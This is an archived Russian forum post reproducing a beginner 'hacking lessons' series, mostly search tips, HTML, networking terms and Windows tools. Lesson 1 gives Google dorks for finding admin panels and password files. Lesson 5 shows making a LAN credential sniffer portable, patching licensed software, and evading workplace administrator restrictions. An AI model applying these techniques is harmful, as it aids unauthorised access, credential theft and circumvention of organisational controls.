Ключи к играм

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Ключи к играм » Архив » программы для взлома ))


программы для взлома ))

Сообщений 1 страница 11 из 11

1

https://forumupload.ru/uploads/0002/25/06/8551-1.gif  https://forumupload.ru/uploads/0002/25/06/8548-5.gif окуратно так как проследуя по этой ссылке вы можете заразится хакерством а его не лечат а только залечивают

на протяжении многих лет выюзывал инфу с инета большую часть проверил почти все работало но компании по защите тоже не отставали хотя большая часть того что тут описано работает на 100%: это факт в умные руки такая инфа на вес золота мне уже безразлична такая тема по этому открываю для всех ету драгоценную инфу

желательно установить говорилку или прочитать с бумаги так легче разобрать а главное повторять в точности или вносить свои изменения

Отредактировано 7Denis7 (30.05.2010 22:06:08)

+2

2

Можно пропустить
___________________________
И так закончилось лето....я повяз в долгах научить его взлому с нуля)))....но я бы не начал писать если бы не одна прекрасная женская особа под именем Наташа....которая очень хочет стать хакером...она отлично учится и схватывает всё на лету ....но к сожалению в компах не очень разбирается....но это я подправлю!
//всегда была мечта хотябы быть другом девушки-хакера....будем эту мечту реализовывать итак....
___________________________

Урок 1.

Самое главное в становлении хакера это его независимость.
Все хакеры независимы и мы в этом уроке научимся быть независимыми!

Для того чтобы быть независимым нужно уметь добывать любую информацию в сети!
Что, к сожалению, умеют не все...
А как вы понимаете добывать информацию можно разными способами, но основной способ это использование поисковых систем. И тут самое главное не ошибиться с выбором!
А самый правильный в нашем случае будет выбор такого поисковика как Google.com
Объясню почему...
В отличии от yandex.ru aport.ru rambler.ru yahoo.com gogo.ru live.com итд google.com уневерсален для поиска
Вы скажете чем хуже тот же yahoo.com ...ну вопервых куча рекламы которая сама по себе отвлекает.....во вторых в Гугле в отличии от Яхуу можно найти то что тебе нужно даже если ты не знаешь что ты ищешь!
Да это так! И мы с вами рассмотрим такой пример!

И так меньше болтовни начинаем поиск!

Приведем  жизненный пример:
Нам нужно найти песню, которую мы услышали на радио и запомнили всего 3 слова…
«We're toking away» какая досада….ну попробуем найти…!

Заходим на wwwgoogle.com и в строке поиска вбиваем – We're toking away.
Видим, что он нам пишет ошибку….может вы имели ввиду «We're talking away  »?
Вот мы и увидели первое преимущество Google.com я лично реально набирал, что слышал в песне….=)
НО! Это не всё  мы видим кучу ссылок и сайтов, которые содержат в себе слова “ We're talking away ” так как наша цель найти песню …..добавляем формат того что хотим найти…в данном случае «.mp3»
и у нас получается запрос вида – «We're talking away .mp3» переходим …
и видим Вот оно! 4 ая ссылка!!!

Мы мало того что узнали как называется группа …и достали текст песни…но еще  мы можем скачать саму песню и посмотреть клип))

И так что мы выяснили….

1)Что подстановкой кавычек мы задаём жесткие рамки для нахождения текста.
Тобишь если мы пишем "жжжжооошш" то нам выдадут сайты только те …  в которых было упомянуто именно такое же слово…
2)Если нам надо найти файл….песню…вордовский документ…видео...мы просто подставляем его расширение .doc .mp3 .rar .avi итд (обязательно с точкой!)

Я знаю, что оно тут есть!!!

Иногда бывает так, что мы знаем то, что на сайте есть то, что нам нужно…
Но встроенный поисковик для сайта убогий…и не может найти ничего на своём ресурсе.
(поверьте, это бывает часто) тогда в ход идёт мощная поисковая машина Google =)
Опять жизненный пример…мне друг постучался в аську и сказал….не могу найти Visual studio C++ , я ему говорю на офф сайте есть она….прошел час….он мне пишет…я не нашёл…помоги пожалуйста…ну что не сделаешь ради друга….
И так я знал что на сайт Microsoft.com в чистом виде лучше не заходить….там чёрт голову сломает что то найти))) ( разве я не прав? )
Сразу пошёл в Google.com и вбил такой запрос….

site:microsoft.com "Visual studio 2005" +download

2_ая ссылка идеально подошла для нас))

А теперь поясню что я тут написал…

1)    site:(сайт на котором мы ищем информацию) в нашем случае Microsoft.com тоесть команда site: даёт шанс искать на определённом сайте….любую информацию файл …итд. Сайт, на котором мы будем искать, пишется вплотную после двоеточия!
2)    "Visual studio 2005" – я конкретизировал при помощи кавычек то, что я хочу найти, если вы точно не знаете, что вы ищите лучше кавычки не писать.
3)     И наконец, +download плюсом я добавляю слово, которое желательно встретить на этом сайте…. Тоесть если я напишу такой запрос - Ламеры +лохи , то мне выдадут на первые места сайты где встречаются эти два слова….
Поверьте, это очень важная функция Гугла плюс\минус она меня не раз спасала!

Пример +/- :  Запрос таков : Отправить смс +бесплатно

И на первой же ссылке мы видим сайт РЕАЛЬНО с которого можно бесплатно отправлять СМС

Конечно вы можете сказать что и без плюса всё хорошо прокатывает…но уверяю что «+» вас еще не раз спасёт….просто примера в голову не лезет)))

А минус занимается тем что удаляет ненужные слова…тоесть если вы хотите найти курсовую а не дипломную работу…вы можете просто задать такой запрос

Пример: “Тема курсовой” –диплом +курсовая

Таким образом, вы найдёте то, что вам нужно!

Ну и говоря о хакерстве, я не могу не упомянуть такую фитчу как «inurl:»

При помощи этой встроенной команды гугла можно найти сайты, у которых в URL (линке она же ссылка) будет то, что вы впишите после двоеточия!
Возможности….
1)    вы можете  с лёгкостью отыскать админку, задавав запрос

site:(любой сайт) inurl:admin

2) Вы можете найти нужный вам файл на сервере….
Пример Site:(любой сайт) inurl:password.txt

Короче это очень важная функция на которую стоит обратить внимание!

Вот собственно главный минимум того что вы должны запомнить….на первом уроке!
Так же хотелось бы, чтобы вы обратили внимания на такие функции как
filetype:
intitle:
и info:

Тоже чрезвычайно полезно ознакомиться с ними!
Более подробно вы можете прочитать про все «Фишки Google»

На этом ресурсе http://www.amazonca.ru/stati/fishki_google-poiska

Если вы станете независимыми от других вы будете чувствовать себя на все 1000%!!!я вас уверяю….и люди будут спрашивать….откуда ты это знаешь? А вы будете отвечать….я прочитал…!!!(а они в недоумении ….где это вы отрыли эту инфу!?) =) но мы то с вами теперь знаем что фитчи гугла существенно облегчают жизнь!!!!

Так же ….забыл сказать….если кто, то не применял этот способ “визуальный поиск”….был на днях такой случай…никак не мог найти марку своего роутера знал только 2 слова «Broadband и роутер» что означает широкополосные и роутер)))
Я вошел во вкладку «картинки» и там на первой же вкладке нашел свой роутер и таким образом узнал всё про него…
__________________________________________________________
Обратите внимание так же на дополнительные функции Гугла http://www.google.ru/intl/ru/options/ особенно на такие как Gmail.com переводчик и вопросы и ответы…..

Хочу сказать, что я погорячился отбросив все остальные поисковые системы ( это не относится к aport.ru & rambler.ru они реально отцтой =)) ) а вот с yandex.ru и live.com
Можно поспорить…..

Допустим yandex специализируется на русских сайтах….что делает большое преимущество для него….
Но на Яндэксе сидят только Учителя и прочие нубы которые не умеют пользоваться такой мощнейшей системой!

Алгоритм Яндэкса и Гугла ОООООчень отличаются….что делает большое преимущество для пользователей Гугла…..ибо когда ваш Доцент наук начнёт искать скачанный реферат то в большинстве случаев он его просто не найдёт….(если вы хотя бы удосужились его перефразировать)

Еще преимущество гугла заключается в том, что он может искать в файлах…расположенных на серваке….(имеется ввиду текстовых файлов) таких как .doc .txt
Тоже недавно сталкивался с таким ,что надо найти документ на приём на работу в частную фирму (государственный шаблон) И мне дали бумажку как он выглядит….
Я просто набрал первую строку этого документа и мне вылезло куча ссылок для скачивания .doc …..шаблонов

__________________________________________________

Так что-то я опять расхвалил Г угол….

Давайте теперь похвалю других…

http://www.live.com/ http://www.bing.com/ хоть и бесполезный поисковик, но у него есть отличная функция….определения, сколько сайтов лежит на серваке…..
всё что нам нужно так это узнать IP сервака….
А делается это так….Пуск---выполнить---там вбить cmd----и в командной строке набрать «ping сайт_которого_нужно_узнать_IP» жмём энтор….и получаем IP….

Далее переходим к live.com и в запрос пишем
IP:207.46.232.182 (как пример)
И мы узнаем, какие еще  сайты расположены на этом сервере.
(В дальнейшем мы узнаем что можно взломать сайт через другой сайт =) )

ПодЫтожим
1)Становись независимым, старайся узнавать всё сам. И люди будут тебя уважать.
2)Знай…если тебе понадобится информация, ты всегда сможешь её найти! \\Вопросы задавай только в самый отчаянный случай.....цени своё достоинство.
3)Я надеюсь, этой статьёй немного заинтересовал вас. И вы измените совё отношение к поиску информации.
4)Хоть я и привёл некоторые из явных преимуществ Гугла не сбрасывайте со счетов другие поисковики...(но используйте их в крайние случаи)
5)Этот пункт я написал для тех, кто может задать вопрос «Что за нах? При чём тут взлом?»так вот знайте….если вы умеете искать и обрабатывать инфу то вы великий хакер..// теперь вы можете без вопроса на форуме «с чего начать?» - начать! свой путь к обучению.

Для первого урока хватит инфы…это самый главный Урок в обучении….поэтому отнеситесь к нему серьёздно….
….п.с уверяю уроки еще будут)))я не зациклюсь только на этом…только летнюю сессию доздам Х-)
Если кому то не понравилось,…извините,…не обижайте сильно))))
А если вдруг понравилось, будет приятно услышать это)))

------------------------------------------------------------------------------------------------------------------------
http://forum.xakep.ru/m_1224792/mpage_1/tm.htm 1]http://forum.xakep.ru/m_1224792/mpage_1/tm.htm
1 урок – Google
2 урок – HTML
3 урок – Независимость+определения
http://forum.xakep.ru/m_1224792/mpage_2/tm.htm[/link]
4 урок – возможности Windows XP
5 урок – Портирование софта
6 урок – Начинаем ломать Pinch + Parser
http://forum.xakep.ru/m_1224792/mpage_4/tm.htm
7 урок – Языки программирования
http://forum.xakep.ru/m_1224792/mpage_6/tm.htm
8 урок  - Взлом Wi-Fi
http://forum.xakep.ru/m_1224792/mpage_7/tm.htm
9 урок – ProRat &  backdoor
10 урок - XSS
http://forum.xakep.ru/m_1224792/mpage_11/tm.htm
11 урок – XSRF aka Cross Site Request Forgery
http://forum.xakep.ru/m_1224792/mpage_13/tm.htm
12 урок  - Начало Пути
http://forum.xakep.ru/m_1224792/mpage_16/tm.htm
13 урок  - Создаем собственный Фейк
http://forum.xakep.ru/m_1224792/mpage_20/key_/tm.htm
14 урок – Фишки от Xakep9009
http://forum.xakep.ru/m_1224792/mpage_24/tm.htm
15 урок - SHELL
http://forum.xakep.ru/m_1224792/mpage_26/tm.htm
16 урок – Эксплойты
http://forum.xakep.ru/m_1224792/mpage_28/tm.htm
17 урок – XSS II Восстание самодостаточных
http://forum.xakep.ru/m_1224792/mpage_37/tm.htm
18 урок - Linux
Можно пропустить
_____________________________________
Итак после выхода моего первого урока мне понизили рейтинг на единицу....обозвали самым матерным словом на этом форуме "Webkill" ну ничего....главное ,что хоть одному человеку да понравилось.
А вообще каждый Хакер должен уметь анализировать .... и я проанализировал свою ошибку...почему меня назвали Webkill я зашел на его сайт...почитал его "статьи" и понял...что меня так могли назвать по двум причинам
1)Потому что я пустословлю.
2)Потому что я пишу то что уже давно известно.
Насчет первого буду исправляться и возьму во внимание "Краткость сестра таланта"
Ну а что касается второго тут могу поспорить...много пользователей даже не подозревают о существовании того что я написал.
В любом случае Хакер должен принимать во внимание замен новой переменной
как это сделал я....посёрчив сайт Webkill`a
_____________________________________
Урок 2.

Каждый уважающий себя хакер должен уметь печатать слепым методом.
Я бы заржал бы если узнал, что Крис Касперски (Гуру в Хакинге) печатал глядя на клавиатуру. Х-)
Было очень смешно когда я был на CC08 и Античатовцы включали фонарики для того чтобы увидеть клаву)))

Натренировать себя в слепом методе можно двумя способами...
Первый способ это зайти на http://play.typeracer.com/ зарегистрироваться там....и соревноваться с другими...
//можете меня вызвать на поединок если хотите....(нормальная скорость печатания в слепую это 31 символ в секунду.
Это очень удобно и интересно в отличии от других аналогов....я натренировал английскую раскладку именно там....
Второй способ это СОЛО на клавиатуре....
http://ergosolo.ru/download/ скачать можно тут....
Мой вам совет....сначало выучите физическое расположение клавиш.... а потом чисто шуруйте первый пробный  набор текста на СОЛО....и вы быстро научитесь печатать.

Поверьте вам это в будущем очень понадобится....когда мы с вами начнём изучать языки программирования вы же не будете всё время искать букавки на клаве)))это будет просто смешно...

Следующее что должен уметь и знать любой хакер это html
html не является языком программирования но при этом он очень функционален.
Без знания html вы не сможете продолжать учиться.
Поэтому чтобы не переписывать целые ресурсы ...там где уже написанно про html я просто дам ссылки...
http://html.manual.ru/
http://ru.html.net/tutorials/html/
Эти ресурсы самые актуальные....изучайте!

Считайте что это ваше домашнее задание ....выучить html !
___________________________________________________________________________

Пока хватит....изучите этот матерьял и вы сильно подниметесь.
Отнеситеьс с огромной серьёзностью ибо как это не печально но в России я давно уже не видел людей печатающих слепым методом....и уж темболее хорошо знающих html....
Можно пропустить
_________________________________________
Более на таких особ как [CODE] не обращаем внимания она только отвлекает от процесса обучения...своим флудом.
Кстати говоря Флуд - распространяется как в результате избытка свободного времени, так и с целью троллинга — например, из желания кому-то досадить.
(определение взято с http://ru.wikipedia.org/wiki/Флуд )
//Опять же спасибо кто положительно отзывается.
_________________________________________

Урок 3.

Если вы серьёздно поставили перед собой цель то вы должны не останавливаться ни перед какими трудностями.
И следующий мой урок будет посвещён преодолению этих трудностей.
Я вам дам слова которые в дальнейшем нам понадобятся для обучения. И без знания которых мы никуда не продвинемся.

Но так как мы с вами хакеры....хоть и начинающие...
это означает что "Все хакеры независимы" //см. Урок 1.
И в этот урок особенно важен для вас.

Чтобы не противоречить собственным понятиям "Все хакеры независимы"
Мой урок будет заключаться в том чтобы вы нашли определения на те слова которые я вам напишу.
Без них вы дальше не продвинетесь.

Те кто нашел определения к словам напишите их сюда. //желательно с сылкой на ресурс.
Один человек не может дать более чем 4 определения //это делается в целях того чтобы все могли попробовать силу своих возможностей. И получить от меня высший рейтинг( звёздочки =) )

Дайте определения словам:
1)IP
2)MAC (не ноутбук a адрес)
3)TCP/IP
4)FTP
5)Telnet
6)Proxy
7)Socks
8)Shell (не автомобильное масло а компьютерное определения "оболочка")
9)Port (порт - что это такое и что за порты 80,21,22,111)
10)Отличие между Trojan  и Virus
11)DNS (что это , как расшифровывается и где используется)
12)Тунэль , Тунэлирование (что это такое , где используется)
______________________________________

Я уверен что у вас всё получится!
Это ключевые слова которые вы ни раз услышыте когда мы дальше будем обучаться.
Поэтому очень важно освоить их.
После того как будут даны все определения мы продолжем наши уроки!

//не забывайте параллельно учить html скоро к нему подойдём ;-)
IP - IP-адрес (IP, ай-пи или айпишник) – это сокращение от английского Internet Protocol Address, то есть уникальный идентификатор компьютера, подключенного к Интернету. IP-адрес по разным версиям представляет собой двоичное число 32 или 128 бит. Форма IP-адреса – запись в виде четырех десятичных чисел, от 0 до 255. Числа разделяются точками. IP-адрес назначается администратором во время конфигурирования компьютеров и маршрутизаторов. Каждый порт маршрутизатора имеет собственный IP-адрес. То есть IP-адрес характеризует не отдельный компьютер или маршрутизатор, а одно сетевое соединение.
http://chtotakoe.info/articles/ip-adres_183.html

MACадрес - Это уникальный шестнадцатиричный серийный номер, назначаемый каждому сетевому устройству Ethernet, для идентификации его в сети. Для сетевых устройств (так же как и для большинства других сетевых типов) этот адрес (permanently) устанавливается во время изготовления, хотя обычно, он может быть изменен при помощи соответствующей (программы). Хотя, в общем-то, это не очень хорошее занятие.
http://gven.ru/faq/10.html

TCP/IP - собирательное название для сетевых протоколов разных уровней, используемых в сетях.
http://ru.wikipedia.org/wiki/Tcp/ip

FTP - английское сокращение, расшифровывающееся как File Transfer Protocol - протокол передачи файлов. FTP используется для передачи файлов с одной машины на другую (естественно, передача через 3,5" дискеты не может быть названа передачей по FTP!). Если вы имеете подключение к интернету, вы можете получить доступ к большому колическву информации, расположенной в различных уголках сети. Для использования FTP необходим т.н. FTP-клиент, подключающийся к FTP-серверу (откуда вы хотите скачать файлы, или наоборот, хотите закачать туда файлы). Анонимный FTP позволяет подключаться к серверу, не имея на нем личных логина и пароля. Как правило, в качестве логина указывается "anonymous", а в качестве пароля - ваш e-mail. Это делается на больших серверах, для того, чтобы каждый мог скачать, например, дистрибутив Linux или какие-нибудь другие полезные программы.

FTP - Файлы передаются в нескольких режимах - режим ASCII (сокр. - American Standard Code for Information Interchange) используется для передачи текстовых файлов, в том числе HTML. Binary режим, как следует из названия, используется для передачи двоичного кода (на самом деле все сложнее, в общем можно сказать, что этот режим используется для нетекстовых файлов, например, картинок). Переключение режимов выполняется командами соответственно ascii и binary, если же вы используете клиент под Windows (например, WsFtp), следует переставить кнопку единичного выбора в соответствующее положение.
http://pages.ykt.ru/maximka/ftp.htm

Telnet – один из старейших протоколов Internet. Telnet – сокращение от словосочетания telecommmunications network protocol, что означает «сетевой коммуникационный протокол». Telnet позволяет пользователям присоединиться к удаленному компьютеру, находящемуся в сети, и работать с ним так, как будто бы работа происходит на удаленном компьютере.
http://chtotakoe.info/articles/telnet_469.html

Proxy сервер - это промежуточный компьютер, который является посредником ("proxy" - посредник) между вашим компьютером и интернетом. Прокси-сервер подключен к Internet по высокоскоростному каналу. Через него проходят все ваши обращения в Internet. Прокси их обрабатывает, и результаты (полученные из Internet файлы) передает вам. Кроме того наиболее часто используемые ресурсы кэшируются (сохраненяются на сервере), что обеспечивает дополнительное ускорение. Другими словами, если один из пользователей уже поработал с медленным удаленным сервером, то другие, обратившись к тому же серверу, будут получать информацию уже не с медленного сервера, а с прокси-сервера. Соответственно, они будут получать данные с максимально возможной скоростью.
http://www.nvcom.ru/faq/a_proxy.php

SOCKS — сетевой протокол, который позволяет клиент-серверным приложениям прозрачно использовать сервисы за межсетевыми экранами (фаерволлами). SOCKS — это сокращение от «SOCKetS» (сокеты, гнёзда).

Клиенты за межсетевым экраном, нуждающиеся в доступе к внешним серверам, вместо этого могут соединяться с SOCKS прокси сервером. Такой прокси сервер контролирует права клиента для доступа к внешним ресурсам и передаёт запрос к серверу. SOCKS может использоваться и противоположным способом, разрешая внешним клиентам соединяться с серверами за межсетевым экраном (брандмауэром).

В отличие от HTTP прокси серверов, SOCKS передаёт все данные от клиента, ничего не добавляя от себя, то есть с точки зрения конечного сервера, SOCKS прокси является обычным клиентом. Так же SOCKS более универсален (поддерживает все протоколы), зато HTTP прокси кэширует данные и может более тщательно фильтровать контент.
Этот протокол был разработан Дэвидом Кобласом (David Koblas), системным администратором MIPS Computer Systems. После того, как в 1992 году MIPS вошла в состав Silicon Graphics (SGI), Коблас сделал доклад о SOCKS на Симпозиуме по Безопасности Usenix (Usenix Security Symposium), и SOCKS стал публично доступным. Протокол был расширен до четвёртой версии Ин-Да Ли (Ying-Da Lee) из NEC Systems Laboratory.
http://ru.wikipedia.org/wiki/SOCKS

shell - это аккаунт на unix-сервере, который позволяет удаленно работать с этим сервером в рамках выданных вам полномочий. В текстовом режиме, разумеется. Это может включать запуск программ, в том числе ботов, компиляцию исходных кодов, использование ssh-доступа к вашему аккаунту в качестве туннеля и многое (или немногое) другое.
http://chat.baikal.net/faq/rusnet-faq_13.html

Port mapping - это переадресация принимаемых данных таким образом, чтобы данные, принимаемые на какой-то порт одного компьютера автоматически переадресовывались на какой-то другой порт другого компьютера.
На самом деле это гораздо легче технически реализовать, чем объяснить сам принцип. Это можно сравнить с солнечным зайчиком: если Вы направляете луч света в зеркало, он "автоматически" отражается и освещает какой-либо предмет. При этом если вы осветили какого-либо человека и этот человек не знает, что луч отразился от зеркала, он будет думать, что свет исходит от того места, где находится зеркало. Так же и здесь: все передаваемые Вами данные безо всяких искажений передаются на другой компьютер, который может быть расположен где угодно.
Эта технология в чем-то аналогична прокси серверу, однако она гораздо проще и гораздо менее гибкая.
Схема примерно такая же, как и при использовании прокси (можно сказать, что port mapping похож на proxy - но это будет то же. что сказать "дедушка похож на внука" - вообще-то это как раз proxy похож на port mapping):
Ваш компьютер >>> компьютер с port mapping >>> удаленный сервер.

DNS - доменная система имен предназначена для преобразования доменных имен в IP-адреса, либо наоборот - IP-адресов в доменные имена. DNS нужны для делегирования доменного имени.
http://www.caravan.ru/reference/faq/first/what-dns/

это всё что я надыбал=D
Можно пропустить
_______________________________________
Спасибо большое очень приятно!!!Webkill приношу свои извинения...
Отдельно пожалуй надо выделить trofik`a этот человек не поленился и таки нашёл почти все ключевые слова которые я попросил...
кроме 10 и 12....ну всё таки попробуйте найти 12 .....
Конечно жаль что всё нашёл один человек...но это будет ему в плюс...не только в рейтинге)))...но и для личного развития!
ОЧЕНЬ ВАЖНО ЧТОБЫ ВЫ НЕ ТОЛЬКО НАШЛИ ЭТИ СЛОВА НО И ЗАПОМНИЛИ ЭТИ ОПРЕДЕЛЕНИЯ!!!
Так что еще раз скажем спасибо trofik и пойдём дальше)))
_______________________________________

Урок 4.

И так...в этом уроке мы с вами рассмотрим возможности нашей ОС (Операционная система)
Каждый кто хочет начинать свой путь в мир хакерства должен знать о такой великой ...бажной (глючиной) системе как Windows XP!!!
И этот урок будет посвещён рассмотрению скрытых (и не очень) возможностей Windows XP

Я думаю каждый из вас сталкивался с проблеммой вирусов....или когда у вас затормаживала система...или когда вы при загрузке системы очень много ждали пока загрузятся программы которые вам сейчас вообще не нужны!!!(автозагрузка)

Наверняка каждый из вас знает комбинацию Ctr+alt+del её мы жмём когда хотим посмотреть что же такое? что затормаживает систему?
И так каждый раз....
Давайте с вами познакомимся с такой скрытой от простых смертных приложением msconfig
вы его можете найти так Пуск---Выполнить...---(и там прописываем)msconfig
И перед вами откроется "Настройка системы"

Нас там будут интересовать 3 вкладки
1)BOOT.INI
2)Cлужбы
3)Автозагрузка

Бывает так что вы удалили свою ОС и установили новую.....
Но при этом у вас до сих пор при загрузке спрашивают....загрузить эту Windows XP или эту))) хотья на одной из вкладок давно уже ничего нету.....

Вот за то чтобы удалить эти ложные вкладки...отчевает BOOT.INI
вообще знайте BOOT - это загрузка //(загрузка устройства...загрузка с флешки...загрузка с жосткого диска итд.)
Переходим на вкладку BOOT.INI и жмём "проверить все пути загрузки"
Далее если он у вас находит не рабочую ссылку....он предложит её удалить....что вы я думаю с удовольствием сделаете....

Следующая вкладка это Службы
Ну сдесь я думаю всё понятно....
ставим галки где нужно...и убираем где ненужно....приведу пример...//установил себе iTunes и "Сервис iPod" прописалась у меня в автозагрузке...а мне это надо*? вот именно ненадо....так что убираем галку и идём смотреть "Автозагрузка"

Автозагрузка

Вот тут восновном я вылавливаю вирусы...которые нахальным образом прописали себя в автозагрузку.....
Кстати говоря!!!только что решил зайти в Автозагрузку... и обнаружил у себя трояна...которые прописал себя в дирректорию
C:\WINDOWS\system32\amvo.exe //давить и только давить!!!!
Как определить что у вас....вирус или нет....
Да очень легко!!!!
В "Команда" прописан полный путь к файлу который требует система при загрузке.....
если вы видете какую то программу которая загружается без вашего ведома....и при этом по "Команда" - по этому путю не узнаёте ни одной программы которой вы пользуетесь....значит скорее всего это вирус....НО если вы не уверены что это вирус...проследуйте по этому пути...(к файлу) допустим C:\WINDOWS\system32\amvo.exe а мы проследуем C:\WINDOWS\system32\ и попробуем найти файл с названием amvo.exe и просканируем его на предмет заражения.....
Уверяю вас в большенстве случаев это окажется вирус....который был пропущен вашим антивирусом....

Так же я думаю по названию вы поняли что от сюда можно "выдерать" назойливые программы...которые затормаживают систему...как вы знаете чем меньше процессов тем быстрее и стабильнее работает ваша система....
Вот допустим....
iTuneshelper кому он сдался при загрузке????
или MSN или ICQ 6 или Skype ....конечно большинство из этих программ НАКОНЕЦ СДЕЛАЛИ галочку автозагрузка !!!
Но к сожалению не все....

Следующий очень важный для хакинга полу не видемый инструмент это regedit aka (also known as) реестр
Пуск--Выполнить--regedit
Это мощное оружие в руках пользователей...и конечно же Хакера))))
Больше чем http://win-reg.narod.ru/intro/intro_01.html?#1 тут вам никто не расскажет.... //основ естественно....
Собственно там всё компактно написанно про реестр.....

И просто необходимо для просмотра http://forum.xakep.ru/m_1051645/tm.htm вот эта страница она вас многому научит....и вообще респект тому кто пополнял её.....//там описанно много фишек которые оптимизируют систему ...сделают её уникальной....и много много еще чего....

Вот одна из фишек которые я юзал давным давно... и удивлял друзей....это "Меняем заголовок окна IE"
прочитайте как это сделать...и сделайте...//познавая такие фишки...вы всё больше и больше будете понимать структуру реестра и за что он отвечает.

Так же реестр помогает оптимизировать систему...тоесть работать быстрее...
Вот тому простое доказательство....
"Убрать принтеры и факсы, а также назначенные задания"  //это описано всё там же....

Ну и на последок я вам напомню про такую уникальную вещь как "Командная строка"
Находится она
Пуск--Выполнить--cmd

Через командную строку можно отдавать команды   
Тофталогия но это так)))
Вам просто необходимо познакомиться с ней(командной строкой)
Чтобы изучить её всё что вам нужно это знать 2 команды....
1)help
2)(команда)/?  - это для того чтобы получить более полную информацию об этой команде. Пример: COPY/?
_________________________________________________________________

Ну и самое основные команды....для начала пожалуй будут
cd - перемещение по деррикториям. Пример : cd C:\ (и мы попадаем в эту диррикторию)
DIR - показывает всё содержимое дерриктории в которой вы находитесь.
RD - удаление папки
MD - создание папки
DEL - удаление одного или нескольких файлов

__________________________________________________

Так же я думаю все знают о такой встроенной служебной программе как
"Востановление системы" но не все знают как она полезна.
Находится она сдесь
Пуск--Все программы--Стандартные--Служебные--Востановление системы

Что эта встроенная программа делает? Она востонавливает систему на тот момент когда она была в том состоянии, когда вас всё устраивало....
Но при этом есть одна маленькая деталь...она удаляет все программы которые были установлены....(до того времени когда была поставленна точка востановления) //о как закрутил)))
Пример:Вы сегодня установили Фотошоп. и сегодня же вы подхватили троян...или вирус....(короче система начала давать сбои) вы берёте делаете откат на день назад .... и у вас всё становиться так как было.....день назад....тоесть без фотошопа....
Но не путайте файлы с программами!!!!

Мне с жалостными глазами говорят.....а я слышал что если сделать откат то удалятся все мои Work.doc Emploee.doc которые я сделал.....

Файлы - это то что сделано в программах....а программы - это то что редактирует файлы.
Так что если вас что то не устраивает .....(в работе системы) не промедляйте ....делайте откат на то время когда всё было отлично!

-------------------------------------------------------

Ну и на последок  расскажу админовскую фишку....
прописываем в командной строке ipconfig /all
и у вас как на ладони все сведенья о вашем соединении..... 
то касается 10 пункта можно было по проще....
Троянами называют тех кто стягивает информацию.// так же важное отличие от вируса это не способность к саморазмножению.
Вирусы служат для уничтожения данных. // отличие от трояна способность к размножению (саморепликации)
Можно пропустить
___________________________________________
Этот урок будет для вас однозначно интересен ибо сейчас я реально расскажу вещь которая вас может заинтересовать во взломе...и в заработке)))//как на этом заработать думайте сами....истина где то там)))
___________________________________________

Урок 5.

Обмани Админа

Пожалуй мы уже разобрались что такое реестр и исполняемые процессы.
Можно преступать к уловка.

1) Уверен что вы не раз сталкивались с тем что когда вы приходите на чужое рабочее место...вам не хватает определённой программы.
Так если рассматривать с хакерской точки зрения... мы часто встречаемся с тем что нужную программу мы не можем установить по тем причинам что это ограничения Админа.

Без проблем.....теперь мы можем схватить все свои хак тулзы с собой ....
В этом уроке я вас научу портировать программы.
Портировать - это когда вы можете открывать любые приложения без её предварительной установки.

Вот то что нам понадобится -
1)Thinstall //я специально залил для вас её сюда
2)И любая программа (установочный файл) которую мы хотим портировать. - я возьму в качестве примера Cain&Able \\программа для анализа и спуфинга трафика....(ворует в локальной сети ICQ , Mail, Сайты  к которым были подклюючены пользователи и многое другое)

Начинаем с установки самой Thinstall ну тут особо мыслить не надо.....после установки обязательно пропатчите её другой программой....просто выберете полный путь к Setup Capture.exe и поставьте везде галочки...это для того чтобы снять все ограничения которые имеет эта программа.

Отлично!
Теперь давайте нам надо понять суть этой программы .....
Почему лучше устанавливать те программы которые не были у вас раннее?(установлены)
Для того чтобы портировать программу ей нужно знать все ключи(это ключи реестра) к которым подключается программа ....а если их нет в системе их надо создать.
Так вот эта программа делает скан(просмотр) ключей которые на данный момент существуют и после установки программы ...затем сравнивает их и получает результат из тех ключей которые были созданы при установке программы.//А если вы уже установили программу на систему затем стёрли её .....то в большенстве случаев ключи остаются в системе не затёртыми....(иначе вы просто могли бы триал программы после оканчания срока действия просто удалять затем снова устанавливать и получали бы полноценную программу еще раз....)

Поехали ...
Открываем LANDesk Setup Cpature
Start--Выбираем диск на который будем устанавливать прогу(у меня это C , а вообще лучше ставьте везде галочки , кроме насителей типа USB) и жмём Pre-install  Scan
Далее идёт скан всех ваших ключей.....

После всей процедуры он предложит вам "Post-install  Scan" - это означает что пришло время устанавливать программу которую мы хотим портировать....
После установки нажимаем Post-install Scan
Программа проверяет все ключи...и выбирает те которые были созданы....
После проверки идёт предложение....где сохранить проект....ну давайте сохраним его на кастом.
Вот кастом путь C:\Program Files\LANDesk\Application Virtualization\Captures
заходим и видим наш проект!!!
Но то что нам нужно это всего дна папка ...а не всё это сборище файлов)))
Заходим в %ProgramFilesDir% и там видим название той программы которую мы хотели порировать.
Всё! программа ваша!

Теперь вы можете тоскать с собой эту папку...или залить её на мыло.... и пользоваться везде....
Вот что у меня получилось. // http://webfile.ru/2237270
Выкладывайте сюда что у вас получилось....

Как это использовать - допустим .... стоит ограничение на IE по входу на ресурсы....так мы просто зайдём с Firefox =))
Нужно что то сделать по работе....в том же Фотошопе...а он не установел.....
И еще великое множество примеров.....(те же хакерские программы в виде Win Sniffer 1.3 )

Иногда бывает что стоит ограничение программ....допустим IE открывается а Firefox нет...и пишет что обратитесь к администратору....
Это легко обходится просто переименовав Firefox.exe в Iexplorer.exe =))

Бывает так что доступ к Пуск--Выполнить невозможен....а нам ведь надо изменять ключи реесра!!!!!!
не беда...эта защита от дураков....
Создаём 123.txt файл и прописываем в нём regedit.exe после чего переименовываем файл в 123.cmd и открываем....)))у нас regedit как на ладони...
этот способ так же работает на cmd.exe ....и любые другие команды которые прописываются в командной строке.

Креатив...вот что должно быть в хакере...не получается так,так сделаем по другому.....//умейте выходить из любых ситуаций...это вам не только в Хакерстве но и в жизни понадобится.
________________________________________
Очень важное дополнение
Как нам уже поведали....я забыл упомянуть , что способ с обманкой (выполнение .cmd) не работает если Админ правильно расставил права в GP (групповые политики) мы с вами позже это изучим....//Этот способ работает когда "Выполнить" визуально недоступен. но при этом Админ забыл проставить правильно права.....(что бывает очень часто)

И опять по закону подлости забыл упомянуть что если визуально закрыт доступ к файлам....вы можете это обайти при помощи любого браузера....
Вбиваете в URL "C:\" и попадаете в Диск "С" и так можете прописывать любые дерриктории....

Так же ....почти никогда не бывает доступ к "Свойство папок" для того чтобы показывало разрешение...
Поэтому надо сделать так....
